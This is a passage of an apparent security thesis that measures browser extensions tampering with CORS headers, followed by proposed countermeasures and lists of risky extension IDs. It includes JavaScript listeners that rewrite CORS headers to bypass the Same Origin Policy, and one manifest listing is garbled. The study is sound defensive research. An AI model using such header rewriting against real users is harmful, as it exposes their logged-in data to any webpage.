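const http = require('http');

const ALLOWED_ORIGIN = 'http://localhost:8000'; // origin of the test page

http.createServer((req, res) => {
  const origin = req.headers['origin'];
  if (origin === ALLOWED_ORIGIN) {
    // CORS headers are only sent for the trusted origin
    res.setHeader('Access-Control-Allow-Origin', origin);
    res.setHeader('Access-Control-Allow-Credentials', 'true');
    res.setHeader('Access-Control-Allow-Methods', 'GET, POST, PUT');
    res.setHeader('Access-Control-Allow-Headers', 'X-Custom-Header');
  }
  if (req.method === 'OPTIONS') { // preflight request
    res.writeHead(204);
    return res.end();
  }
  res.writeHead(200, { 'Content-Type': 'text/plain' });
  res.end('response data');
}).listen(8080);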
Limitations Despite much effort, for a few extensions, we could not confirm our suspicion
that they tampered with CORS headers. There are two reasons for that.
— The extension code was obfuscated, and we did not find a way to deobfuscate and analyze
it. For instance, we found extensions written mostly in hexadecimal. The static
analyzer successfully found CORS headers among their literals; however, when interacting
with them, the CORS headers did not appear to be manipulated, and we could not confirm
this either way, as we could not manually review their code.
— Or the extension had listeners that clearly tampered with CORS headers, but they
were not triggered when we interacted with the extension. This is the case, for instance,
of the ZenMate VPN, a very popular extension on Chrome [158], Firefox [160] and
Opera [159]. It has a response listener that, if triggered, would allow any
cross-origin request.
4.3 Results overview
We crawled the extensions in the middle of May 2018. Table 9.1 shows an overview of
the data we collected and analyzed, and Table 9.2 presents the top 11 most requested
permissions. Chrome provides the largest share of extensions (66,401), followed by Firefox
(9,391), then Opera, which totals 2,523 extensions. It is worth noting that a good
number of extensions do not request any permission at all: 17.52%, 17.32% and 8.08%
of Chrome, Firefox and Opera extensions respectively.
Chrome Firefox Opera
Extensions 66,401 9,391 2,523
Declare no permissions 11,632 1,627 204
Have webRequest(Blocking) permissions 6,316 1,152 320
Have all hosts permission 5,031 893 265
Extensions analyzed 101 30 5
Tamper with CORS headers 51 11 1
Unconfirmed 5 1 1
Table 9.1 – Data collection and analysis results overview
Permission Chrome Firefox Opera
tabs 49.29 44.19 54.93
storage 37.52 49.91 43.08
activeTab 18.85 25.08 10.90
http://*/* 15.41 8.66 17.24
https://*/* 14.49 8.76 16.53
contextMenus 14.30 17.40 21.56
notifications 14.12 13.36 16.37
webRequest 12.10 17.18 16.17
<all_urls> 12.07 18.36 18.15
cookies 9.66 7.55 8.40
webRequestBlocking 9.58 12.29 12.76
Table 9.2 – Most requested permissions among Chrome, Firefox and Opera extensions
Extensions with HTTP headers manipulation capabilities
As one can see from Table 9.2, all-hosts permissions (<all_urls>, http://*/* or https://*/*),
webRequest, and webRequestBlocking are among the most requested permissions. Extensions
that declare both the webRequest and webRequestBlocking permissions, giving
them the ability to tamper with HTTP headers, represent 9.51%, 9.51% and 12.63% of
Chrome, Firefox and Opera extensions respectively (See Table 9.1). These are all the
extensions which can potentially tamper with CORS headers in order to disable the Same
Origin Policy in browsers and authorize cross-origin requests. It is simply a coincidence
(and not an error) that Chrome and Firefox have the same share of extensions that can
manipulate HTTP requests. It is worth mentioning that, among these extensions with
header manipulation capabilities, 79.65%, 77.52% and 82.81% of them on Chrome, Firefox
and Opera respectively can do so for any HTTP request, as they also declare an all-hosts
permission (<all_urls>, http://*/* or https://*/*) along with the webRequest and
webRequestBlocking permissions.
Chrome: Productivity (33.35%), Photos (11.85%), Developer Tools (11.55%)
Firefox: Privacy & Security (20.33%), Social & Communication (14.79%), Web Development (13.79%)
Opera: Productivity (26.33%), Privacy & Security (21.32%), Social (13.79%)
Table 9.3 – Top 3 most popular categories among extensions with the ability to manipulate
HTTP headers
Categories of extensions Table 9.3 presents, for each browser, the top 3 most popular
categories among extensions with the capability to tamper with HTTP headers. Productivity
is the most popular category among Chrome and Opera extensions. This category does not
exist on Firefox, where Privacy & Security is the most popular category. The Privacy
& Security category is also the second most popular on Opera. It includes adblockers
and privacy extensions such as Adblock, Ghostery and uBlock Origin, which are popular
on Chrome, Firefox and Opera. There is no Privacy & Security category on Chrome;
nonetheless, most privacy and security extensions are classified in the Productivity
category, which is the most popular category on Chrome. The fact that privacy and
security extensions tamper with HTTP headers is easily understood, because most of them
intercept HTTP communications in order to block advertisements and other trackers.
Social and developer-oriented categories are also popular among extensions with the ability
to manipulate HTTP headers. In particular, a developer category is the third most popular
on Chrome (Developer Tools) and Firefox (Web Development). Among those are extensions
used by developers for testing purposes, such as user agent switchers. The extensions
User-Agent Switcher for Chrome [147], User-Agent Switcher [146] on Opera and User-Agent
Switcher [146] on Firefox tamper with the User-Agent request header to simulate different
browsers. It is more surprising that the Social and Photos categories appear among the
most popular categories of extensions with the ability to tamper with HTTP headers. The
Social category contains various helper extensions for social networks and applications such
as Facebook, Twitter and Whatsapp. This can be explained by the fact that these extensions
often need the capability to tamper with (remove) headers like the X-Frame-Options header,
in order to frame the social network sites in the extension UI pages, allowing users to log into
their social networks from these extensions.
[Figure 9.5: bar chart of the percentage of extensions per number of users (0-1,000; 1,001-10,000; 10,001-100,000; 100,001-1,000,000; >1,000,000), for Chrome, Firefox and Opera]
Figure 9.5 – Distribution of users of extensions with the capability to tamper with CORS headers
Distribution of users Figure 9.5 shows the distribution of the users of extensions with
the ability to manipulate HTTP headers. On Chrome and Firefox, the majority of these
extensions have less than a thousand users, while on Opera the distribution of users is
more even. It is worth mentioning that a few extensions have millions of users: this is the
case for 1.26%, 0.36% and 4.7% of Chrome, Firefox and Opera extensions respectively.
Compared to Chrome and Opera, the small number of Firefox extensions with millions of users
can be explained by the fact that the WebExtensions API [100] is relatively new on Firefox,
where the XPCOM [156] API was long used for extension development. The most popular
extensions include adblockers and tracker blockers such as uBlock Origin, Ghostery and Adblock.
Extensions that effectively manipulate CORS headers
The static analyzer flagged 136 extensions for manual analysis (See Table 9.1): 101 on
Chrome, 30 on Firefox and 5 on Opera. After manual vetting, we confirmed that 63 of them
(51 on Chrome, 11 on Firefox and 1 on Opera) were effectively modifying CORS headers.
This represents almost half of the extensions flagged for manual analysis. All the extensions
reported here have been heavily tested and were effectively tampering with CORS
headers. On Chrome, we found 4 extensions written in hexadecimal, for which we could
not draw any conclusion regarding CORS header manipulations. The other unconfirmed
extension was the ZenMate VPN extension, present on Chrome, Firefox, and Opera. It has
a response listener that adds many CORS response headers, but we could not trigger this
listener by interacting with the extension. It also has quite a large code base, which further
made it hard to review.
Origins and targets of the CORS requests Table 9.4 shows the webpages and web
servers whose communications are intercepted and modified in order to authorize CORS
requests. The majority of extensions (52) allow any webpage to make unauthorized cross-origin
requests, either to any web application server (29 extensions) or to one or more specific
servers (23 extensions). The remaining 11 extensions allow one or more specific webpages to
connect to any server (4 extensions) or to one or more web application servers (7 extensions).
As one can see, the majority of extensions allow CORS requests from any webpage, which is
rather worrisome.
To any server To one or more servers
From any webpage 29 23
From one or more webpages 4 7
Table 9.4 – Sources (origins of webpages) and targets (web application servers) of CORS
requests allowed by extensions. The table reads from row to column
Chrome Firefox Opera Total
User action (click) 10 1 1 12
User-defined settings 3 2 0 5
Total 13 3 1 17
Table 9.5 – User action required to enable extensions
User action required to activate extension We further analyzed the extensions to
see whether they required a user action to be activated before they started manipulating
HTTP requests. Table 9.5 presents the results. Only 17 extensions require a user action
to be activated; all other extensions start tampering with CORS headers as soon as they
are installed. In most cases (12 extensions), the user action is a click to activate the extension.
Nonetheless, 5 extensions give the user more control over the extension settings by allowing
them to define the webpages and web servers whose HTTP communications will be manipulated.
We think that this is the right way to go regarding CORS header manipulation:
as these headers are sensitive, it is preferable not to enable the functionality by default
in extensions, but rather to give users control to decide when such a feature must be
enabled. We discuss, in Sections 5 and 6, different guidelines on how to safely manipulate
CORS headers for testing purposes.
Users of extensions Figure 9.6 shows the distribution of the users concerned by these
threats. Most of the extensions have less than a thousand users. Some are relatively
popular, with thousands of users, and 3 extensions have more than 100k users. The
most popular one is the Allow-Control-Allow-Origin: * Chrome extension [5],
which totals 455,875 users. Interestingly, this extension does not correctly tamper with
CORS headers: it breaks legitimate CORS requests with credentials. For instance, after
installing the extension, we could no longer play Youtube videos. This is also the case for
CORS Toggle [35], the only Opera extension we found tampering with CORS headers. See
Section 4.5 for more details.
[Figure 9.6: distribution of extensions per number of users (0-100; 101-1,000; 1,001-10,000; 10,001-100,000; 100,001+)]
Figure 9.6 – Distribution of users of extensions manipulating CORS headers
Categories of extensions Figure 9.7 presents the categories of the extensions we found
effectively tampering with CORS headers. Interestingly, the Developer Tools category is
the most popular, followed by the Productivity and Accessibility categories. However,
less than a third of these extensions are in the Developer Tools category, suggesting that
CORS header modifications are rather widespread and not limited to extensions provided
to advanced users (developers), for testing purposes for instance.
Figure 9.7 – Categories of extensions manipulating CORS headers
Implications of HTTP headers manipulations Manipulating CORS headers has
two main implications. The first is that, if the CORS mechanism is well understood
and the manipulations are done properly, as in the case of the CORSER extension
presented in Section 3, then the extension authorizes unauthorized cross-origin requests,
thereby allowing web applications to bypass the Same Origin Policy and access data
of cross-origin web application servers, even though such servers do not authorize cross-origin
accesses. The second implication is that, without a good understanding of the
CORS mechanism, an extension can break legitimate requests made by web applications
that the user is currently interacting with. As an example, consider a webpage that makes a
cross-origin request to a server that authorizes the request: the server responds with an
Access-Control-Allow-Origin header set to the origin of the page which makes the request,
and an Access-Control-Allow-Credentials response header whose value is set to true.
If an extension then modifies the Access-Control-Allow-Origin header to *, it breaks
this legitimate request (See Section 2 for more details about the CORS mechanism).
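As an illustration of the second implication, the following sketch (not taken from any specific extension) shows the kind of careless response listener that produces this breakage: every response gets Access-Control-Allow-Origin: *, which invalidates legitimate credentialed responses that carried a specific origin.
chrome.webRequest.onHeadersReceived.addListener(function (details) {
  // Drop any Access-Control-Allow-Origin sent by the server and replace it with *
  const headers = details.responseHeaders.filter(
    h => h.name.toLowerCase() !== 'access-control-allow-origin');
  headers.push({ name: 'Access-Control-Allow-Origin', value: '*' });
  return { responseHeaders: headers };
}, { urls: ['<all_urls>'], types: ['xmlhttprequest'] },
   ['blocking', 'responseHeaders']);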
4.4 Breaking the Same Origin Policy
Table 9.6 shows how the extensions we have analyzed tamper with CORS HTTP headers,
and which types of CORS requests (simple, preflighted) they authorize.
Chrome Firefox Opera Total
Simple 51 11 1 63
Preflighted 29 6 1 36
With credentials 7 3 0 10
Total 51 11 1 63
Table 9.6 – Extensions breaking the Same Origin Policy - Types of authorized CORS
requests
Simple requests All extensions modify HTTP headers so as to authorize at least simple CORS
requests without credentials. This is achieved by adding the Access-Control-Allow-Origin
header to response headers, setting its value to *, or to the origin of the webpage which
makes the cross-origin request. It is worth mentioning the case of the Disable CORS
Chrome extension [46]. It changes the value of the Access-Control-Allow-Origin
response header to the origin of the webpage from which a cross-origin request is made.
Hence, it requires that the server first responds with an Access-Control-Allow-Origin
header, whose value it then replaces with the origin of the page. It still bypasses SOP, because
a server can respond with a value of Access-Control-Allow-Origin set to an origin different
from that of the webpage making the request. Without this extension, such a CORS
request would have failed; by changing the value of the header to the origin of the requesting
page, the request becomes authorized.
Preflighted requests More than half of the extensions (35) also modify CORS headers in order
to allow preflighted requests. In most cases, in order to allow preflighted requests,
extensions add the Access-Control-Allow-Methods header to responses, setting
its value to the most commonly used HTTP methods (GET, POST, PUT, DELETE, HEAD).
Regarding HTTP headers, most extensions also add the Access-Control-Allow-Headers header
with a predefined set of known HTTP headers. A very few of them reflect the value of the
Access-Control-Request-Headers request header in the response, in order to allow requests with custom
headers.
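The two behaviors can be sketched as follows (this is an illustration, not the code of any specific extension; the reflection case reuses the savedRequestsHeaders bookkeeping of Listing 9.2): a fixed list of methods is always advertised, while the allowed headers are reflected from the recorded Access-Control-Request-Headers value.
chrome.webRequest.onHeadersReceived.addListener(function (details) {
  const headers = details.responseHeaders;
  // Fixed, predefined list of methods
  headers.push({ name: 'Access-Control-Allow-Methods',
                 value: 'GET, POST, PUT, DELETE, HEAD' });
  // Reflect the headers requested during the preflight, if recorded
  const saved = savedRequestsHeaders[details.requestId];
  if (saved && saved['access-control-request-headers']) {
    headers.push({ name: 'Access-Control-Allow-Headers',
                   value: saved['access-control-request-headers'] });
  }
  return { responseHeaders: headers };
}, { urls: ['<all_urls>'], types: ['xmlhttprequest'] },
   ['blocking', 'responseHeaders']);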
Requests with credentials From a security perspective, simple or preflighted CORS
requests without credentials are less sensitive, as they are not made with user credentials
(See Fig. 9.3). Even though they represent unauthorized accesses to web servers and break
the Same Origin Policy (because browsers must not allow cross-origin requests unless the
web servers respond with the appropriate CORS headers), the responses to these CORS
requests could potentially be obtained by other means, for instance by using a proxy server
to simulate simple and preflighted CORS requests.
The most concerning issue, from a user perspective, are the extensions that allow CORS
requests with user credentials. We found 10 such extensions (7 on Chrome and 3 on
Firefox). Fig. 9.4 demonstrates a CORS request with credentials, where any webpage can
access the user's Google account information (in this example, the email address of the user).
4.5 Breaking legitimate CORS requests
The second concern we found among extensions that modify CORS headers is the breakage
of legitimate web applications. Table 9.7 presents the extensions which can break legitimate
CORS requests because of harsh modifications made to HTTP headers.
Chrome Firefox Opera Total
Simple 3 1 0 4
Preflighted 30 5 0 35
with credentials 36 8 1 45
Total 46 9 1 56
Table 9.7 – Breaking web applications, because of a harsh modification of CORS headers
by extensions.
Figure 9.8 – Breaking legitimate CORS requests by adding multiple values to the
Access-Control-Allow-Origin header
We found 2 extensions on Chrome and 1 on Firefox that add * as a second value to
the Access-Control-Allow-Origin response header when a server already responds with the
Access-Control-Allow-Origin header. This causes the requests to fail, because the
Access-Control-Allow-Origin header cannot have two values: it is either *, or a single origin.
Fig. 9.8 shows the message displayed in the browser console in the case of such an error.
Another case is that of the CloudExtend Gmail for NetSuite Chrome extension [30]. It
fixes the value of the Access-Control-Allow-Origin header to a specific origin, regardless of
the origin of the webpage making the request. Therefore, web pages whose origins differ
from the fixed one can no longer legitimately connect to the web servers whose responses
are modified by the extension.
For preflighted requests, the breakages are due to the fact that many extensions fix the list
of methods they set as the value of the Access-Control-Allow-Methods header, or the list of
headers set in the Access-Control-Allow-Headers header. This prevents web applications
from making CORS requests with methods or headers other than the predefined ones. Even
when web servers accept the custom headers and methods, these are overwritten in the
responses by the extension, causing a mismatch and then a failure of the preflighted request.
Figure 9.9 – Breaking legitimate CORS requests with credentials by changing
Access-Control-Allow-Origin to *.
Finally, the vast majority of legitimate CORS breakages are due to a misunderstanding
of CORS requests with credentials. Most of these requests fail because extensions change
the value of the Access-Control-Allow-Origin header to *, even in the presence of CORS
requests with credentials. This prevents legitimate web applications from making CORS
requests with credentials. In fact, to allow CORS requests with credentials, the value of the
Access-Control-Allow-Origin header must be the origin of the webpage which issued the
request, and not *. Fig. 9.9 shows the error displayed in the Google Chrome console when a CORS
request with credentials fails because the value of the Access-Control-Allow-Origin header
is set to *.
At https://swexts.000webhostapp.com/cors/youtube.webm, one can view a video demonstrating
how the Allow-Control-Allow-Origin: * extension on Chrome [5], which has more
than 400k users, breaks the Youtube application. Installing this extension makes it impossible
to play Youtube videos, because it breaks CORS requests with credentials.
Fig. 9.9 shows an error message displayed in the console regarding this error. The CORS
Toggle [35] extension on Opera poses the same issue.
5 Discussions
The main question we raise here is: must all HTTP headers be treated equally? For
instance, changing the value of the Server header, which indicates the name of the server
hosting a resource, does not have the same implications from a security perspective as
tampering with CORS headers, as we have shown throughout this work. The manipulation of
security-critical headers by browser extensions is a threat that users must be aware of
when installing an extension that has this capability. It is therefore important to consider
the manipulation of security-critical headers as a threat, and to review extensions accordingly,
so as to identify them and warn users at install time. However, we acknowledge
that this may be a daunting task from a browser vendor's perspective, because extensions
may be obfuscated in order to evade such a review process. Therefore, we think that the
ability to tamper with security-critical headers must not be automatically granted to extensions
when they have the permission to tamper with HTTP headers via the webRequest
and webRequestBlocking permissions. Among security-critical headers, we include the CORS
headers (See Table 2.2). We also include Content-Security-Policy [275], which is used
to fight against content injection attacks and in particular the notorious XSS [41, 135],
X-Frame-Options, which helps mitigate clickjacking attacks [244], and any header that
could potentially introduce serious security threats in web applications. We propose two
possible directions, from a browser vendor's perspective: (i) either disallow the manipulation
of CORS and other security-critical headers, as also suggested by Kapravelos et al. [213],
or (ii) require that extensions explicitly request a dedicated permission for each header
that they need to tamper with.
5.1 Disallowing security headers manipulations
It is not clear why a benign extension would need to modify headers such as the CORS headers.
In fact, extensions are not subject to the Same Origin Policy: cross-origin requests made from
an extension are allowed, regardless of whether the targeted server responds with CORS
headers or not. However, extensions that make cross-origin requests may be considered
suspicious by browser vendors during the extension review process. Hence, an extension
can first disable the Same Origin Policy via CORS header manipulation, then inject a
script in a webpage from which it can unsuspiciously make cross-origin requests, without
being considered a malicious extension during the review process. This is exactly
what we have achieved with the CORSER extension.
Because of the security threats posed by extensions tampering with CORS headers, we argue
that manipulating security headers must be forbidden by default in browser extensions.
This has been recommended by Kapravelos et al. [213] regarding the Content-Security-Policy
and X-Frame-Options headers, even though no browser vendor has implemented it so far.
Moreover, browser vendors already do not allow extensions to tamper with a few HTTP
request headers, including Authorization, Host, Cache-Control, If-Modified-Since,
etc. [28, 60]. To prevent extensions from modifying these restricted headers, the headers are
simply not included in the list of headers passed to the different events triggered by HTTP
communications, such as the onBeforeSendHeaders event, where HTTP request
headers are usually modified. Similarly, to prevent extensions from tampering with security
headers (CORS headers, Content-Security-Policy, X-Frame-Options), browser vendors
may choose not to expose them to the corresponding request and response event handlers.
5.2 Requesting permissions to manipulate security headers
Our second proposal towards mitigating the threats introduced by extensions tampering
with HTTP security headers is to require that browser extensions explicitly request a permission
to be able to tamper with a sensitive header. Hence, in addition to the webRequest
and webRequestBlocking permissions required to intercept HTTP requests, the ability to
manipulate a sensitive header would be granted to an extension only if it has explicitly
requested that permission, by including the name of the sensitive header in the list of
permissions of the extension manifest.json file, as shown in Listing 9.3 below.
1"permissions": [
2" < al l _u rl s >",
3" w eb R eq u es t " ,
4" w eb R eq u es t Bl o ck in g " ,
5"access-control-allow-origin"
6]
Listing 9.3 – Permissions to manipulate the Access-Control-Allow-Origin CORS
response header
The advantage of this proposal is that it gives browser vendors the possibility to warn users
of the security implications of installing an extension that can tamper with HTTP security
headers. In fact, we argue that web browser vendors must warn users about extensions
tampering with security headers such as the CORS headers. Unfortunately, when installing an
extension which could potentially break the Same Origin Policy, no browser vendor currently
warns the user about such threats. This is mainly due to the fact that header modifications
are not considered a security threat when extensions are reviewed.
From an implementation perspective, and for backwards compatibility, if an extension does
not have the permission to modify a header, the modifications that it makes would simply be
ignored. One may argue that this breaks the functionality of the extension; in reality, when
multiple extensions tamper with HTTP headers, each extension can already alter and potentially
revert the modifications done by the extensions that manipulated the headers before
it. Moreover, there is no guarantee on the order in which extensions will be passed the
HTTP headers [28]. So the effect of the browser ignoring the modifications done by an
extension can already occur today, if the user has installed another extension which reverts
those modifications.
6 Countermeasures
In this section, we discuss different proposals that allow web applications, users, and extension
developers to fight against the threats introduced by the manipulation of CORS headers by
browser extensions.
6.1 Web application servers
The main problem with the ability of extensions to tamper with CORS headers is that
extensions break the backwards compatibility of the CORS mechanism. In a normal setting,
in order to authorize CORS requests, both the browser and the web server must implement
the mechanism. If either the browser or the server does not implement CORS, then the SOP
applies, in which case cross-origin requests are forbidden by default. With the ability of
extensions to tamper with CORS headers, however, the response returned by the server can
be delivered to webpages as soon as an extension adds the appropriate CORS headers. To
mitigate this, a server must implement CORS by default and try to ensure that a request
effectively originates from a trusted webpage before responding with data. This can be
achieved, for instance, by an exchange of tokens prior to authorizing cross-origin requests,
as in the mitigation of CSRF (Cross-Site Request Forgery) attacks [135]. Web servers can
also check the values of the Origin and Referer headers to ensure that they are set in the
request, that they match each other, and that they belong to a trusted origin. We found
that the majority of extensions that tamper with CORS headers do not modify these two
headers, meaning that a server implementing CORS can detect the effective origin of the
request. Only a few extensions change the value of the Origin header in a way that causes
a mismatch with the Referer header. As a general recommendation, when a cross-origin
access is not authorized, a web server should not respond with data.
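A minimal sketch of such a server-side check follows (assumed logic, not a drop-in solution; the trusted origin is a placeholder): data is returned only when the Origin header is present, trusted, and consistent with the Referer header.
const http = require('http');
const { URL } = require('url');

const TRUSTED_ORIGINS = new Set(['https://app.example.com']); // placeholder

http.createServer((req, res) => {
  const origin = req.headers['origin'];
  let refererOrigin = null;
  try { refererOrigin = new URL(req.headers['referer']).origin; } catch (e) {}

  const trusted = origin && TRUSTED_ORIGINS.has(origin) && origin === refererOrigin;
  if (!trusted) {
    res.writeHead(403); // do not respond with data
    return res.end();
  }
  res.setHeader('Access-Control-Allow-Origin', origin);
  res.setHeader('Access-Control-Allow-Credentials', 'true');
  res.writeHead(200, { 'Content-Type': 'application/json' });
  res.end(JSON.stringify({ data: 'only for trusted cross-origin requests' }));
}).listen(8080);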
6.2 Extension Users
From a user perspective, the main protection against the impact of extensions tampering
with CORS headers is to log out of web applications and clear all authentication credentials.
Ultimately, one can use a browser environment where no extension is installed (the browser's
private or incognito mode), or even a browser with no extension at all, in order to interact
with sensitive web applications.
6.3 Extension Developers
For extension developers, there is a need for a better understanding of the CORS workflow,
as we have presented it in Section 2. Particular attention must be paid to preflighted requests
and to requests with credentials, so as not to break legitimate web applications. Extensions
such as CORSER must be used by advanced users only, to perform controlled experiments
such as testing web applications. Ultimately, full control must be given to the user to define
when to activate the extension and on which pages requests can be made. One can take our
CORSER extension (https://github.com/mesolido/corser/) as a starting point and further
customize it for the needs of web application testing.
7 Conclusion
In this chapter, we first showed how trivially extensions can manipulate CORS headers,
and the implications this has on browser security, on the security and functionality of web
applications, and on the security and privacy of user data. We developed and published the
CORSER extension on Chrome, Firefox and Opera. In doing so, we demonstrated that,
despite the fact that CORS header manipulation disables the Same Origin Policy security
mechanism in browsers, this practice was not identified as a security threat by browser
vendors. We then analyzed extensions in the wild, and found a few of them effectively
tampering with CORS headers so as to authorize unauthorized cross-origin requests.
Furthermore, we found that CORS is often misunderstood, as extension developers harshly
manipulate CORS headers and thereby break legitimate web applications. To mitigate the
aforementioned threats, we suggest that the ability of extensions to manipulate CORS
headers be forbidden by default, or otherwise that extensions be required to request explicit
permissions for the headers they can manipulate. Finally, we discussed countermeasures to
fight against these threats from a user and web application perspective.
Chapter 10
Conclusion
The time is now long gone when web applications were made of content originating only
from the server of the application. Nowadays, web developers make extensive use of third
party content in order to quickly build full-fledged applications. Web applications provide
different services to users (mail, social networking, banking, work, etc.), and browser
extensions are third party programs that serve to customize the user's browser and improve
her browsing experience. Hence, web applications retain and manage user data. Browsers
implement the Same Origin Policy (SOP) to ensure that two or more web applications
cannot directly access each other's data, unless the web applications explicitly authorize the
accesses via mechanisms such as CORS (Cross-Origin Resource Sharing). Tightly integrated
into browsers, extensions however are exempted from compliance with the Same Origin Policy
and therefore have access to user data retained by web applications. They can also access
many more pieces of user information and features in the browser.
In this thesis, we studied the security and privacy threats posed in the browser by the web
applications the user interacts with and by the browser extensions that she installs.
There are many attacks targeting the web, of which XSS is the most notorious. Third party
tracking is the ability of an attacker to benefit from its presence in many web applications
in order to track the user as she browses and to build her browsing profile. There are two
categories of tracking: stateful tracking, of which cookie-based tracking is the best known,
and device fingerprinting. In the first case, a third party stores information in the user's
browser and uses it to recognize her. In the second case, the tracker instead collects information
about the user's browser and uses it to recognize her across different browsing sessions.
Malicious or poorly programmed extensions can be exploited by attackers in web applications,
in order to benefit from the extensions' privileged capabilities and access sensitive user
information.
Content Security Policy (CSP) is a W3C mechanism proposed for mitigating the impact of
content injection attacks in general, and XSS in particular. We performed three main studies
on CSP. In a first work, we analyzed the interplay of CSP with the SOP. In fact, CSP is
a page-specific policy that applies only to the webpage on which it is deployed, while the SOP
allows same-origin webpages to access each other's data. We showed that, because of this, a CSP
can be violated by scripts running in same-origin webpages that have no CSP or a different CSP.
We performed an empirical study and found that many web applications are indeed subject
to CSP violations due to their same-origin webpages, and we then discussed countermeasures.
In another work, we scrutinized the three CSP versions and how browsers implement them.
We found that a CSP deployed to protect a webpage could end up being interpreted
differently depending on the browser, the version of CSP it implements, and how
compliant the implementation is with respect to the specification. To help developers deploy
effective policies that encompass all these differences in CSP versions and browser
implementations, we introduced the deployment of dependency-free policies (DF-CSP). This
ensures that, irrespective of the browser where the application runs, the policy enforced
provides the same protection against attacks. Finally, previous works have identified many
limitations of CSP. We reviewed the different solutions proposed in the literature and in
the specification, and demonstrated that they do not successfully mitigate the identified
shortcomings of CSP. Therefore, we proposed to extend the CSP specification with four
new extensions: a blacklisting mode in CSP, a URL arguments checker mechanism, a
new directive disallow-redirects for mitigating CSP bypasses based
on HTTP redirections, and an efficient reporting mechanism for collecting feedback about
the runtime enforcement of CSP. We showed that these extensions require few modifications
to the current implementation of CSP; to demonstrate this, we implemented the proposed
extensions.
Turning to third party tracking, we proposed and implemented an architecture that can be
deployed by web developers willing to include third party content in their applications while
preventing cookie-based tracking. The architecture consists of a Rewrite Server, which
automatically rewrites webpages in order to redirect third party requests to a trusted Middle
Party Server, which removes tracking information exchanged between browsers and third
party servers.
Regarding browser extensions, we first showed that the extensions a user has installed and
the websites she is logged into can serve to uniquely identify and track her. To do
so, we set up a website where we detect and collect the set of extensions installed in the
user's browser and the web applications she is logged into. Our results show that
around 55% of users are uniquely identifiable when they have at least 1 extension installed,
and around 20% are uniquely identifiable when logged into at least 1 web application.
Interestingly, we could uniquely identify around 90% of the users having 1 or more extensions
installed and being logged into 1 or more websites. Then, we studied the interactions between
browser extensions and web applications and demonstrated that malicious or poorly
programmed extensions can be exploited by web applications to benefit from the extensions'
privileged capabilities. We found around 200 extensions that can be exploited by web
applications to bypass the SOP and read other web applications' data, read user cookies
and mount session hijacking attacks, access the user's browsing history, bookmarks and list
of installed extensions and use them for tracking purposes or to serve advertisements,
download malicious software to damage the user's system or exfiltrate user data, and store
information in the extension storage and use it for tracking purposes. Finally, we demonstrated
that extensions can disable the Same Origin Policy by intercepting and adding or modifying
CORS headers in order to authorize cross-origin requests. We demonstrated this by publishing
the CORSER extension on Chrome, Firefox and Opera. Even though this extension clearly
disables the SOP in browsers, it was considered benign by browser vendors. We furthermore
performed an empirical study and found that a large number of extensions have the ability
to disable the SOP in browsers. More worryingly, we found that the CORS mechanism is
widely misunderstood among extension developers, because many of them tamper with CORS
headers in a way that breaks legitimate web applications. To mitigate these threats, we
propose more fine-grained permission systems and review processes for browser extensions,
which would let browser vendors warn users about the threats posed by the extensions they
install. Users can fight against these threats by logging out of web applications, or even by
avoiding the use of sensitive web applications in browsers where they have extensions installed.
Future works and general thoughts
The formalization of dependencies (Chapter 4) can be extended to account for interactions
with same-origin pages (Chapter 3). Also, the semantics of a CSP deployed on a page
embedded as an iframe depends on whether the page is sandboxed by its parent or not.
Browser extensions present many more security and privacy threats that can be investigated
further. Finally, some of the tools we built to conduct the different works presented in this
thesis could be further engineered in order to make them more usable by the public.
Appendix A
Appendix
Table A.1 – Extensions with the same code base which gives *.fliptab.io access to brows-
ing history (get/delete), bookmarks (get), extensions (get/enable/disable/uninstall) and
storage
bddmmehmgpjhhmbbmngdjhlednmkbken
cajmbfbhhfelhgolhldhhodkclpakcfe
cepmfckfppjpbkjgnpokojedlngflnca
clkodoejadlbjaopcjoijihebbgipjff
dekpebffaadijeaogggfhjemdbjgbcao
dkpndikhfepllbpaafgcelembimabofo
eeiedbnahjonkmimigblgchlefcklhok
efdddbobcofamdjmekphjlhgmcnhobbp
ehmhopjniedignnkdeijmpmodhcppgif
eilbnnflfpkhhfmhmlhflhecceajpkcj
fieoemdbopiialnojhifcndkenhjkbmm
fkpmpnljocdllgmplhnmjhjmmilbnofj
gfgchcclfmppnfoakdlhgdhnolbpiedf
glfbbjdfmmlanpikdedpjoeimlijjcjj
hmbedbiicehadpbhbipafffieolpjolh
hocncjdhccalpmblkpagbmjebkfkibbm
iamlligjelallbdddajmbojjjhadkmcf
jcffnpjkbahanenhcnhhdfopkjlpflfm
jokpapkhjeahjbkemfjfhjgcogmbcpoi
kkejopfphkmldfpdmcljfoinfcljijjf
klfeojnepdoehgddffbcjiamcjjahmgj
lbfidebeingoondbmpeapjoeeoloanak
lgphbplfjpemcghfcoajehcmikflcbbd
lmbcpiodajlbgmjbiajgcjdalgbofcbn
loggojfoonblkkhkjpijapeheoogagki
lpkfidfkgflpbakdnhpojiejlpdanknh
mgmodhbknbfmpjmilankiffnjbelcipo
mibaeahdcconphmdndbeipegldkkbcjh
odpiaedkmdpcheddbkilnkelhhocoenn
pfdaccgdljiifplhfnjcacapfedngonb
afddmpnodjaifgjibafjcbfaplnoipei
Table A.2 – Extensions with the same code base for triggering downloads from vk.com,
*.vimeo.com, *.coub.com, *.kinopoisk.ru
nfhipbkhabgmkhahoaagkcgppcjikjgl
idenapkfefkbknhbmfgeaclpcpbhcnbe
fnnlocjimhjpmgfjhjamdkjhemfhkhjo
lmlnplkfbiihcpkghkkmfefjdaccmbcc
kbiocjbkoohjjkkeaafiemjeidgalllh
dccmnjciogmmahaogjgkocongokmieog
ekfkljjojhnnhfedepfnbhhfjklagngk
hhfgpbjpilbbaomjmdpnfchbpipehiif
pgajmafmbajahclonccaoaoleghhnpam
ipeeopcjpgcbgnfogjlickeilmkbonen
jfpmehlefcchhhmlmennihbbihaolabk
kcollknpphnodcjdkcmgpjmlbaenabao
backekeabechifnekobfachchocbmjag
mfpbgndgoogfplejodpbhnfmaibnalkf
ojhheobonaamlhlcdngacakdcigpeokl
mienmjdbnnpaigifneeiifdbjkdgelha
amaobfendgcolppeioeageanmillkmkc
Table A.3 – Extensions with the same code base which leaks topsites, history and/or
bookmarks to *.atavi.com, *.atavi.test
iglbnbabjdfaobglhonmnlkdbommiebd
knflcnelciofoghldagpknelepafjeif
lamnafpjcnoclihgpefhdbefcmjikhaj
jffjjdoccjiflmckicphblggbppfgklk
ofmacdiceehcibkfednmgpkhgfhpacgi
jpchabeoojaflbaajmjhfcfiknckabpo
Table A.4 – Extensions with the same code base, provided by Fabasoft, which give access
to the current tab cookies
ajlbdflhaaflcepndpkdgejimggjcpnm
